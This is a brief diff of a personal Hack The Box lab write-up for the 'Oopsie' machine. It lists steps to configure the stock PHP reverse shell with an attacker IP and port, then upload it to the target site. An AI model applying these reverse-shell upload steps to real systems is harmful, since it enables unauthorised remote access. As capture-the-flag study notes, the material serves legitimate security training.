impulsado/wannaNotes/Writeups/HTB/Very Easy/Oopsie TO DO/00 - Oopsie.md

 # Reverse Shell
 Located in `/usr/share/webshells/php/php-reverse-shell.php`
-Change port and ip.
-Upload the file.
-Dirbust the site again to find `.php`.
+Change port and ip and then upload the file.
 ```bash
 $ip = '10.10.15.56';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS